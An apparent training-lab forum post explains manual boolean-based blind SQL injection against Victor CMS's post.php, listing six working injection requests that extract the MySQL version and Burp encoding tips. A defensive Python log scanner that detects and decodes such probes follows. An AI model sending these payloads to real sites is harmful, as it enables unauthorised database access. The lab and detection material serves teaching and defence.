During the walkthrough by Alexis in the video it looked like things were not going as expected. I spent some time trying this out myself in the Victor CMS lab and want to share my experiences; it might be helpful for others. My observations are as follows:
- The MySQL version detected by SQLmap (5.0.12 in my case) is not correct. Using the exploit "Victor CMS 1.0 - 'Search' SQL Injection - PHP webapps Exploit" I was able to detect it as 5.5.56-log. This can cause confusion if you expect substring(version(), x, y) to give the same results as detected by SQLmap.
- The correct use of substring(string, x, y) is to give the position in the string as x and the length of the substring you want to compare as y. In our case we match on one character, so y should always be 1.
- In my case it did not work when the '='-sign was URL-encoded. Not sure why, but I noticed that the '='-sign was not URL-encoded when the request was sent via the application. So in Burp, after URL-encoding the string, I changed the '%3d' back to '=' and it worked reliably after that.
Calls with positive boolean result that determined the MySQL version (5.5.56 in my case):
Character 1: GET /post.php?post=1+AND+substring(version(),1,1)='5'%23 HTTP/2
Character 2: GET /post.php?post=1+AND+substring(version(),2,1)='.'%23 HTTP/2
Character 3: GET /post.php?post=1+AND+substring(version(),3,1)='5'%23 HTTP/2
Character 4: GET /post.php?post=1+AND+substring(version(),4,1)='.'%23 HTTP/2
Character 5: GET /post.php?post=1+AND+substring(version(),5,1)='5'%23 HTTP/2
Character 6: GET /post.php?post=1+AND+substring(version(),6,1)='6'%23 HTTP/2
In all these cases post 1 loaded correctly. With other values the post did not load properly.
Hope this helps.
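From the defender's side, the request pattern shown in the post is easy to pick out of web-server access logs, and the URL-encoding detail above (the '=' arriving as either '=' or '%3d') is exactly the kind of thing a naive string match misses. The following is an added example, not code from the post or from Victor CMS: it parses combined-style access-log lines (an assumed format; the sample lines are constructed), decodes each query parameter before matching, flags substring(version(),N,1)='c' probes, and, given the response size of a normally loaded post, reconstructs which characters the probes confirmed.

```python
"""Detect boolean-based blind SQLi probes of the shape
substring(version(),N,1)='c' in access logs (added example, not from the post).
The log format is assumed to be Apache/nginx combined-style; the lines in
SAMPLE_LOG are constructed for this example."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log: a normal load of post 1 (5120 bytes), a true probe
# (same size), a false probe sent with %3d instead of '=' (much smaller page),
# an unrelated request, and a second true probe for position 2.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /post.php?post=1 HTTP/2" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /post.php?post=1+AND+substring(version(),1,1)='5'%23 HTTP/2" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /post.php?post=1+AND+substring(version(),1,1)%3d'4'%23 HTTP/2" 200 310
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /post.php?post=2 HTTP/2" 200 4980
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /post.php?post=1+AND+substring(version(),2,1)='.'%23 HTTP/2" 200 5120
"""

# Combined-log-style line: client, identd, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Matched against the *decoded* parameter value, so '+', '%3d' and '%23'
# have already been turned back into ' ', '=' and '#'.
PROBE_RE = re.compile(
    r"\bsubstring\s*\(\s*version\s*\(\s*\)\s*,\s*(\d+)\s*,\s*1\s*\)\s*=\s*'(.)'",
    re.IGNORECASE,
)


def decoded_params(target):
    """Split the request target's query string into decoded (name, value) pairs."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_log(text):
    """Return one finding per request whose parameters carry a version probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line in the assumed format; skip rather than guess
        for name, value in decoded_params(m.group("target")):
            p = PROBE_RE.search(value)
            if p:
                findings.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "position": int(p.group(1)),
                    "char": p.group(2),
                    "status": int(m.group("status")),
                    "size": int(m.group("size")) if m.group("size") != "-" else 0,
                })
    return findings


def probing_sources(findings):
    """Map each client IP to the sorted set of string positions it probed."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["position"])
    return {ip: sorted(pos) for ip, pos in by_ip.items()}


def confirmed_chars(findings, baseline_size):
    """Reconstruct what the probes confirmed: a probe whose response size equals
    the size of the normally loaded page was a TRUE comparison, so the attacker
    learned that character (useful for impact assessment during response)."""
    return {f["position"]: f["char"] for f in findings if f["size"] == baseline_size}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("sources:", probing_sources(found))
    print("confirmed:", confirmed_chars(found, baseline_size=5120))
```

Decoding before matching is the important design choice: because the comparison is done on the value parse_qsl hands back, the '%3d' variant and the literal '=' variant produce the same finding. In a real deployment the baseline size would be taken from the same client's non-probe request for the same post rather than hard-coded.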